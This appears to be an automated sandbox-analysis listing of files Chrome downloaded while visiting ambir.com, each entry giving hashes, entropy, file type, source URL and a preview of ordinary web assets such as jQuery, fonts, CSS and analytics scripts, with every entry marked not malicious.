                                                                                                                                                                                              Preview:!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.5.1",
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (56581), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):56581
                                                                                                                                                                                              Entropy (8bit):5.616813238760409
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:/9Pw8JKM4lvJIv59MelX2U/KNRQlZp0l7XMYofg8JKM4lvJIv59MelXz0XS+wO:/9PYoRz0XSi
                                                                                                                                                                                              MD5:2BAB25B92CF3961A09DCE19E4825ED6C
                                                                                                                                                                                              SHA1:62BF4DA1A1E7370ACC544E63E4F5BB442A96B78B
                                                                                                                                                                                              SHA-256:FAC3F76981D5ED35722FD6B20D070DEE66C784BF32B9BC877EB726D174EB7BB9
                                                                                                                                                                                              SHA-512:1929D3D64284FF1ECC45B34A49C34635C0812199DADC6106C2684BBC44D3F30795FB1399BC9214FCE4AD21B8B4060A7D156316B4FBD5B283C505278C6706FBE4
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://static.zohocdn.com/forms/js/formscommonlive.edbb0f480ff95d2fca0876bafe97f584.js
                                                                                                                                                                                              Preview:var ZFConstants={SAVE_RECORD_STATUS:1},ZFHttp={GET:"GET",POST:"POST",DELETE:"DELETE",PUT:"PUT"},ZFMimeType={APPLICATION_JSON:"application/json"},ZFFormField={ADDRESS:{MAP_INFO:"_Map_Info",COUNTRY:{KEY:"_Country"},STATE:{KEY:"_Region"},CITY:{KEY:"_City"},ADDRESS_LINE1:{KEY:"_AddressLine1"},ADDRESS_LINE2:{KEY:"_AddressLine2"}},NAME:{SALUTATION:{KEY:"_Salutation"}}},SystemGeneratedField={PAYMENT_AMOUNT:{LINK_NAME:"PaymentAmount"},ZF_ADDED_LATITUDE:{LINK_NAME:"zf_added_latitude"},ZF_ADDED_LONGITUDE:{LINK_NAME:"zf_added_longitude"},ADDED_LANGUAGE:{LINK_NAME:"ADDED_LANGUAGE"},VERIFY_PERMA:{LINK_NAME:"VERIFY_PERMA"},REFERRER_NAME:{LINK_NAME:"REFERRER_NAME"}},ZFFieldTypeConstants={SINGLE_LINE:1,MULTI_LINE:2,NUMBER:3,CURRENCY:4,DATE:5,TIME:6,NAME:7,ADDRESS:8,EMAIL:9,WEBSITE:10,PHONE:11,DROPDOWN:12,RADIO:13,CHECKBOX:14,MULTIPLE_CHOICE:15,DATETIME:16,SECTION:17,DECISION_BOX:18,FILE_UPLOAD:19,DECIMAL:20,RATING:21,HTML_TEXT:22,SLIDER:23,SIGNATURE:25,GEOLOCATION:26,FORMULA:27,UNIQUE_ID:28,IMAGE_CHOI
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 1024x603, components 3
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):78918
                                                                                                                                                                                              Entropy (8bit):7.985905875518624
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:iNOv9b42q6X1/J7bBUL2wE/p7qta4TGHHcCHyz8aQGa:zv/qYb+L2wE/Rl4T+HcCHywGa
                                                                                                                                                                                              MD5:ED37A083BF7D84E7DFBE03B77AFF487D
                                                                                                                                                                                              SHA1:8556A83197E9EEDBD3C6A61294B63B9E97D6E7A3
                                                                                                                                                                                              SHA-256:939560FB6F5048FC92EA3A36491756663E27C481846AA9D439447F13C092E9D7
                                                                                                                                                                                              SHA-512:13A7ADBE3C222132BCF43EEE04A36AA907E4BBB2312A017181138FEC4FEDF25E790C732D8F04B7CF5D773035E9FC49B32CF9FD6D347B69249FADD957EA475F26
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://ambir.com/wp-content/uploads/2023/08/slide2-1024x603.jpg
                                                                                                                                                                                              Preview:......JFIF.....`.`...........................................!........'.."#%%%..),($+!$%$...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$......[...."..........5...................................................................V.y.7 .eQr..Q.....b...w1.~.P>+F...g..\...S.......ty..mr.P.)...@.G!..^.Gs../.9..g.F7..$...0.8.-..H.....tC|.Esl.....+..F..r....e..l...HcQ. l....bdv.`29A.S.1.!....Q...).f..\X...V..a$c.f.cv.....Z.....>\ijL.#.;..F8....1'..>...C......\..........rr..p..z.......aH.Ct.u.k.n.a/).....=.V...c..^.r.m+O....=..ul.u.vLAC$..T.Dy=,M$..W..*u.m..[..#u...8=,A.y..g.......3..4.....m.=Zk...'4.*.,d.c..%... ..@..d.\^".A.i..m'_...Lr=.i..Y!.>+H8.)D.i...Z.ej.l........s.....w#...5...mG +.s.... ......c..|.'...U.C$X..E..F1w8....s.....{...#<.N9.TH{.'H.....F...A. Qp...X..%.u.f28&G.......o.J..0..M.l..G.DR.QFS... r...@.t...u.C*81^..q...].e..._...L"... .a.ds^.A .....[\..Eh/7...L....M^.C...q...Ds...;.>{B7.l.t..K^..?w.1C./.>.E.j..+..NRb....b.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                                              Entropy (8bit):2.7773627950641693
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                              MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                              SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                              SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                              SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://td.doubleclick.net/td/ga/rul?tid=G-5NGH3KRVGD&gacid=59994235.1732134501&gtm=45be4bj0v9180601725za200&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067555~102067808~102077855~102081485&z=1373063728
                                                                                                                                                                                              Preview:<html></html>
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (9242)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):18547
                                                                                                                                                                                              Entropy (8bit):5.342701968911617
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:Z9RjlRE8iSf4cPmgtV7uoOKIgxaxTovK3r3WhdMkI0KpXYv2kq:3LRkvYmgbUjTyiy3pd12kq
                                                                                                                                                                                              MD5:42D39F0018CF5D39CC897AFF30315BB7
                                                                                                                                                                                              SHA1:0CCAB04B9FA399D8397605B98AC874967B268E54
                                                                                                                                                                                              SHA-256:792FD8391BDA501BE23ED2A4717EDF153EB9956DDDFDA7B63CF1EB7281FE561B
                                                                                                                                                                                              SHA-512:96D8DDD464B504333F2E3C6414B8CFFE31400B1B83B38C6ED82B608D11228FB72F6E9CCD7F4EA415EAA1CE3CE74760DD864B7014CBBC5623659A6D86A9C481A1
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:./*!. * jQuery blockUI plugin. * Version 2.70.0-2014.11.23. * Requires jQuery v1.7 or later. *. * Examples at: http://malsup.com/jquery/block/. * Copyright (c) 2007-2013 M. Alsup. * Dual licensed under the MIT and GPL licenses:. * http://www.opensource.org/licenses/mit-license.php. * http://www.gnu.org/licenses/gpl.html. *. * Thanks to Amir-Hossein Sobhi for some excellent contributions!. */.!function(){"use strict";function e(e){e.fn._fadeIn=e.fn.fadeIn;var t=e.noop||function(){},o=/MSIE/.test(navigator.userAgent),n=/MSIE 6.0/.test(navigator.userAgent)&&!/MSIE 8.0/.test(navigator.userAgent),i=(document.documentMode,"function"==typeof document.createElement("div").style.setExpression&&document.createElement("div").style.setExpression);e.blockUI=function(e){d(window,e)},e.unblockUI=function(e){a(window,e)},e.growlUI=function(t,o,n,i){var s=e('<div class="growlUI"></div>');t&&s.append("<h1>"+t+"</h1>"),o&&s.append("<h2>"+o+"</h2>"),n===undefined&&(n=3e3);var l=function(t){t=t||{},e.block
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (9217)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):244375
                                                                                                                                                                                              Entropy (8bit):5.4541358501238815
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:pfLeYH8AtPJ137OeR8NteqZEbkxZNsucrl0xYurPK713EN:pfLeYc+PJxH8NNfFcrHurPK713C
                                                                                                                                                                                              MD5:98A1AA6D0155EA8597C93CD050CE5808
                                                                                                                                                                                              SHA1:C844C1CBAA79A4F09F50E2DF3F648B8B5AA6CB5E
                                                                                                                                                                                              SHA-256:527BF3DACC5EB62211130FE4BF315C682861320AB25B4AA2EFE6EA87A760DB8C
                                                                                                                                                                                              SHA-512:BB01621E0CBE1185D2167CEDB9517A29FE6537AE0E23254243DF90F36A66A0E1D91034E9A772E76C94FC1E1E969DB9082177777EC6085A752B3BCB9BC8B98BC2
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):974
                                                                                                                                                                                              Entropy (8bit):5.0883778865345235
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12:UsJ3u6E+ARP6E4pAR0M36EeARzEhBARkK6E75ARrlK6E83DARMNK6ExpARL33K6m:F5ubPwy0M37Aq3WrIp5JyO5MjJq
                                                                                                                                                                                              MD5:BDBBC9B6F964EE4F4C1D1DEBD83B0068
                                                                                                                                                                                              SHA1:A072F927E93DC614AF17487C74A7F95327703059
                                                                                                                                                                                              SHA-256:ABB8C8A48E1155C695ED2F6108CEAF1E8E08A320101DF132817B3BE9BC77FF38
                                                                                                                                                                                              SHA-512:4F96A91CE372EA15FD9BC1A7E780EEC828B6DE75251107AAAB952C0F2ECA653E257BA55952C912143304999A743D9C0E0D24BFA3A7410A4DB389F577C8326D8C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://static.zohocdn.com/forms/css/themes/media/customMedia.bdbbc9b6f964ee4f4c1d1debd83b0068.css
                                                                                                                                                                                              Preview:/* $Id: $ */.@charset "UTF-8";./* CSS Document */..../*@media only screen and (min-width:1024px) {....backgroundSecBg {padding:30px;}..}....@media only screen and (max-width:768px) {....backgroundSecBg {padding:30px;}..}..@media only screen and (min-width:700px) and (max-width:735px) {....backgroundSecBg {padding:30px;}..}..@media only screen and (min-width:650px) and (max-width:700px) {.. .backgroundSecBg {padding:30px;}.}..@media only screen and (min-width:550px) and (max-width:650px) {....backgroundSecBg {padding:20px;}..}..@media only screen and (min-width:450px) and (max-width:550px) {....backgroundSecBg {padding:20px;}..}...@media only screen and (min-width:350px) and (max-width:450px) {....backgroundSecBg {padding:10px;}..}.....@media only screen and (min-width:300px) and (max-width:350px) {....backgroundSecBg {padding:10px;}..}....@media only screen and (min-width:250px) and (max-width:300px) {....backgroundSecBg {padding:10px;}.}.*/.........
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):757
                                                                                                                                                                                              Entropy (8bit):5.149630921140191
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12:UCX7HAXNph7hHijN8IUH/uQc7Ib18mRy+4y12EwdwKgA65txItSQMa7QyX7Gogzu:DX6SOuQNE+4LERKgA+txoS2yo+RRJiaM
                                                                                                                                                                                              MD5:E69E76CFAD09BDCB62281ACCEBF77217
                                                                                                                                                                                              SHA1:C98FB6D1FC3FF56CE7C0B73658AD7C7BE0D54FD8
                                                                                                                                                                                              SHA-256:DE4EFB123DB7F98EFAD6C7E5765132C470E4E9788EE3092C9F5866C04BF12C76
                                                                                                                                                                                              SHA-512:85CF3574CCC39818330E568918D5376B69CDCC728071B9B5E07A562B86B38652D14A407481142381278E0F024EA5FACCC957E4DE54DDDF2E5DF6CCD6F17C7254
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:/**/try{hbl.client.callbacks.pollevents(.{. "capacity": false,. "conversation_has_slot": false,. "conversation_id": "tM65kxeIWm5Vcm4e542fr0UBjA8B6bor",. "in_active_conversation": false,. "ipaddress": "8.46.123.75",. "is_popup": false,. "last_index": 0.0,. "machine": "nrpc-http-5d9875854f-sgkxr",. "new_events": [],. "operator_composing_state": "active",. "operator_has_sent_message": false,. "operator_nickname": null,. "resend_nickname": false,. "resend_status": false,. "site_is_online": false,. "status_state": "offline",. "visitor_id": "QnUrnKaYLl744rSP542fr0UBrj6a8ok0".}.);}catch(e){}try{if(document.getElementById('olark-11732134538640')) hbl.util.remove_element('olark-11732134538640');}catch(e){}
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 78196, version 331.-31261
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):78196
                                                                                                                                                                                              Entropy (8bit):7.997039463361104
                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                              SSDEEP:1536:1iGQV8Q8UOUMUd5UY3qyCkHQCCz2LL1F+u3MHLGxe3U:QVWuF33qy7HQchFz8HnU
                                                                                                                                                                                              MD5:E8A427E15CC502BEF99CFD722B37EA98
                                                                                                                                                                                              SHA1:A9922842A120A7F1EACED667480C5E185A106D69
                                                                                                                                                                                              SHA-256:D0B4256ABED72481585662971262EABEE345C19F837AF00D7CE24239D3B40EEF
                                                                                                                                                                                              SHA-512:113775748A4166C07E58C26CF6DB7FED473732DC6124B8EE0F0DCC0D6439EB2AB2C5D9E01C67324FDF9DE4105349CF30CC5796A0B0E0CE9A08F337B9D4E10B7B
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://ambir.com/wp-content/plugins/elementor/assets/lib/font-awesome/webfonts/fa-solid-900.woff2
                                                                                                                                                                                              Preview:wOF2......1t..........1..K......................?FFTM....`..N.....h..B.6.$..0..4.. ..+...[.u..p.(..U.d..{-.n.Pn...._=V2.e..vp.~........U..1...=..B..b....mvS....w.C.+.$...(..MMI.iH}..O...4.7.s...Y.).*.*....}..^...{^...R.z....f..h4dD7.:1*...Cj..l.8M..T...]}.]?Z..v....g.yV...^..\.?.wM|......Ws..yf%..PL.....~.z.w.S.uQw..........EY.!.........j.O.....c...>T|....W...Zk*...9.......XJ...../I`x.R....c.h..w...?tm..l...LQ......hMg...x...1.F...cU.b|.3....v.Kr.f.H ..9 @....... ......'..j...Vq.:.Q..+....._..(...J.....~../..Y<."......GB..:..P.B...7q...K.{...F"..3....6?.C,..B..P.V.......C.C*..\....+....a...X.z..Tzdn.P.M....li...l2);.!..wX..xh.o.u!.........O.......Ew.$b7X..8d..H...s...z#d..&...J.G...Q.M.....rV?.....&....#...t]........+...*.*..........v...$X.P............ h.z.{...../F.-Y..!.a.1...&.;.^^.U.U.E....!O......./+~......*...Q.|.n@.W..P.tc.l.--....]6..........u..[.SN....i....4-......"...fC...`........@.......l=..g...-..C8...B.X.........g.~..p.1%..x.A.X..
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (12843)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):21715
                                                                                                                                                                                              Entropy (8bit):4.8489347523592174
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:78UtGKRNeruWkVHhVDop2Q5775slDoBQ5ydGli:QoGRyJ1hVEp2ZE
                                                                                                                                                                                              MD5:040DB5B6D2D7AD208664372A005EEAB1
                                                                                                                                                                                              SHA1:830903740FE54FB63D37088FBFEDFB1130D7F126
                                                                                                                                                                                              SHA-256:2632143B9131E5E592FE87893E84FA1F70296AA1D658FFCE5F6E8C3BBF6DEF52
                                                                                                                                                                                              SHA-512:9B69CA8152F807BAE9E45FDA60C48DE09F44E1ACD0B9A972662076061853E820F74D9EFB4B9E5205B6E4524B3670050F239A537526057AE217C6DEFF785E02F3
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-b7463f6d.min.css
                                                                                                                                                                                              Preview:@keyframes spinner__animation{0%{animation-timing-function:cubic-bezier(.5856,.0703,.4143,.9297);transform:rotate(0deg)}to{transform:rotate(1turn)}}@keyframes loading__animation{to{transform:translateX(100%)}}body.wc-block-product-gallery-modal-open,body.wc-modal--open{overflow:hidden}.wc-block-grid__products .wc-block-grid__product-image{display:block;position:relative;text-decoration:none}.wc-block-grid__products .wc-block-grid__product-image a{border:0;box-shadow:none;outline:0;text-decoration:none}.wc-block-grid__products .wc-block-grid__product-image img{height:auto;max-width:100%;width:100%}.wc-block-grid__products .wc-block-grid__product-image img[hidden]{display:none}.wc-block-grid__products .wc-block-grid__product-image img[alt=""]{border:1px solid #f2f2f2}.edit-post-visual-editor .editor-block-list__block .wc-block-grid__product-title,.editor-styles-wrapper .wc-block-grid__product-title,.wc-block-grid__product-title{color:inherit;display:block;font-family:inherit;font-size:in
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):172
                                                                                                                                                                                              Entropy (8bit):6.540465276046223
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:0lyg1ZryllZhIdaajyMwNvEwaIyAAduoklYpIHFG9zHNwHtGOR2hJusErITPou+l:0oWZmlvhW0MwTaojosYpgFG9iv2hgs7s
                                                                                                                                                                                              MD5:95C663A2248C7C59FBDDD35CA897F67C
                                                                                                                                                                                              SHA1:63CF58B08CACA0D44DB91249F9D1E38BD9C48A75
                                                                                                                                                                                              SHA-256:EBAEC8FE0A64F2323B3453E9B1F1FD41EB9A18DEC881CD8AF4F11772DF8D6C5D
                                                                                                                                                                                              SHA-512:7FBA13627B94A414AD4EB5203C4BDE2509E266C4167542F6CC84760202B6940AAA1611EFC55918D39EB7B2ADF242DADC034DC4C35A5604440AA1EB8A22B44974
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://ambir.com/wp-content/themes/ambir/images/search2.png
                                                                                                                                                                                              Preview:RIFF....WEBPVP8L..../.....0..?...F....o..9... .. ."0.$...Q....i\BD.'...-rT..tr.q..M&..@Y...X&s..q...>.crk.5.9.'.%Gc?..WY^...Yr+4..S.BJ...e.e....dhb...ZkE....j..`..`.?.*.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:JPEG image data, progressive, precision 8, 443x225, components 3
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):16914
                                                                                                                                                                                              Entropy (8bit):7.953692103466845
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:jEO+B9QMfLxLN58cKVwG+UkpYUnxOtLKAoIfoRKriHfqp/WW:jEdBBf58DV5gYiARD3r+fs
                                                                                                                                                                                              MD5:3B34F318052301E1B23EC78536954466
                                                                                                                                                                                              SHA1:A53F29F044A6585B83B70FAD9C1118E16E08F930
                                                                                                                                                                                              SHA-256:F05B0D68AA5F5B099EA09E3901EC4BAB6E982E34952B0147A3B775ACB93B4EDD
                                                                                                                                                                                              SHA-512:E4418236CE2376C3E4710DA817C4111E61813243493E75197E12B86C37180A49D70FEBF51937228FA5EBCA502B34EC3B63E995EDCDA482682FE00EBCD07A2895
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:..........................................................................................................................................................."..........6..............................................................................................{..w..m....cq.v7...A..q ....>5.....5..{.-.k.z.....@..lC.Z.p`...qa..+..c"1....c..E.............aq.g.;.k.o....X.......S..{A.{E.{.....W.]...Q...!l...U..qri/...].....|..l.g.f.F=P.Y....z..j..c.9(B.\X,..sW.@.......b.VL.5~P.c|..{....F..Wh..}....|.n...e.>R.Tb...=.l...+`5.9.5b.N.E(....U.4.SR.$(...wy.l................X.o.-...<..m.....ZB../9.g/.gK.#............%t`....f....)E..*.!{aK~................b.`...s...V_..v.X.7...V..t.....].=................mq5...1OZe.W{.(.._u.._S.L.*g.....c..R.\..[.[.M...9C..z...z...'/.......}....u.........~S.:....N....H..m..Q........uZ..E.v......"z....4\....+.@F._.....Ar..j..J.He.{.x.'.......@...Lw;Z.Re.Y...l_..i..h..iEv..'..!>s...R..\.8.......:.2s...~/.u.......F..O1...;~Z.1
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):757
                                                                                                                                                                                              Entropy (8bit):5.154960098737413
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12:UCX7HAXNph7hHijN8IUH/uQc7Ib18mRG+4y12EwdwKgA65txItSQMa7QyX7Gogzu:DX6SOuQN4+4LERKgA+txoS2yo+RRJiaM
                                                                                                                                                                                              MD5:F8CFCB8FEA51A2DDCE7AD11089C3D9AA
                                                                                                                                                                                              SHA1:C0F8A4C8EF47CBF49CE7B5174C5534824B388BD4
                                                                                                                                                                                              SHA-256:BD0930D47EFB3EF8A378E0D7E527D9ED5D7FC1C3414961EF74FE8E7EE0DDF8EA
                                                                                                                                                                                              SHA-512:258DF39EF6966694A4CC031D663ED4E1029F27EC5EAC96C342527011530BABAD8BC9050C57750B4523E1F03087884A7057A0BCE0C589BB79A130579313AE595D
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://knrpc.olark.com/nrpc/p?j=olark-11732134538640&&c=pollevents&q=828.38639.1&i=tM65kxeIWm5Vcm4e542fr0UBjA8B6bor&s=7486-534-10-2045&v=QnUrnKaYLl744rSP542fr0UBrj6a8ok0&g=undefined&cb=hbl.client.callbacks.pollevents&next_poll_time=15000&version=api-1.2.1&pretty=true&_rnd=0.8438471990110759
                                                                                                                                                                                              Preview:/**/try{hbl.client.callbacks.pollevents(.{. "capacity": false,. "conversation_has_slot": false,. "conversation_id": "tM65kxeIWm5Vcm4e542fr0UBjA8B6bor",. "in_active_conversation": false,. "ipaddress": "8.46.123.75",. "is_popup": false,. "last_index": 0.0,. "machine": "nrpc-http-5d9875854f-6kz2t",. "new_events": [],. "operator_composing_state": "active",. "operator_has_sent_message": false,. "operator_nickname": null,. "resend_nickname": false,. "resend_status": false,. "site_is_online": false,. "status_state": "offline",. "visitor_id": "QnUrnKaYLl744rSP542fr0UBrj6a8ok0".}.);}catch(e){}try{if(document.getElementById('olark-11732134538640')) hbl.util.remove_element('olark-11732134538640');}catch(e){}
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (6414)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):385690
                                                                                                                                                                                              Entropy (8bit):5.582091670126337
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:S4OVMX/iOG9e5PmPL97aBJDMfgQJYjOg3x0/aHA:bOQ6Q5PmR7edg
                                                                                                                                                                                              MD5:A6799D20718F6A292B8B6968C78ED581
                                                                                                                                                                                              SHA1:4F4219927A0D7DA21854C41FE0EAD1123ED481D4
                                                                                                                                                                                              SHA-256:3B14C066EBF91F460341888008CBEA66878F4214FAE5B41D1F3976843714E755
                                                                                                                                                                                              SHA-512:BF4D9082957E513042551E135E2131495D61B3314D90F37DB7F7D285E57CA97A4F93675BC91B69F4D14D8E5E852297993CA61AC43A3D9AE6803C1BDA49C10A42
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://www.googletagmanager.com/gtag/js?id=AW-1070729751
                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"5",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_cross_domain","priority":26,"vtp_rules":["list","^ambir\\-technology\\.myshopify\\.com$","^ambir\\.com$"],"tag_id":14},{"function":"__ogt_ads_datatos","priority":26,"vtp_instanceDestinationId":"AW-1070729751","tag_id":36},{"function":"__ogt_1p_data_v2","priority":16,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":true,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"#TextField4","vtp_isAutoEnabled":true,"vtp_manualPhoneEnabled":true,"vtp_manualAddressEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_postalCodeValue":"#TextField5","vtp_lastNameValue":"#TextField1","vtp_phoneType":"CSS_SELECTOR","vtp
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 13388, version 1.0
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):13388
                                                                                                                                                                                              Entropy (8bit):7.981896017121787
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:KPp1Y0kc+9CQmQ1My6T5E1nOT3bU4FTCFOZtDN:KvKL9CPQ1GT5EhOTrrZCQN
                                                                                                                                                                                              MD5:8C4B05D4371467BA1D0BC60839C6DCB9
                                                                                                                                                                                              SHA1:4B7BAD6C115B963523D3CD7AD52EBF717135E24A
                                                                                                                                                                                              SHA-256:BF9CFE01317E3758DD38982921DC1F26CC7243237D02E7ED90D3830B6F4E8ED0
                                                                                                                                                                                              SHA-512:BBC736EA4982C31478FFA27ED69AD7C3EFB1B6A691129A9A9D10DC6D2256022043EE22464F9AA2BAA267DE0C8D95FD7B6D28A8D58BFD997EDB26F152E51243D3
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4mxKKTU1Kg.woff2
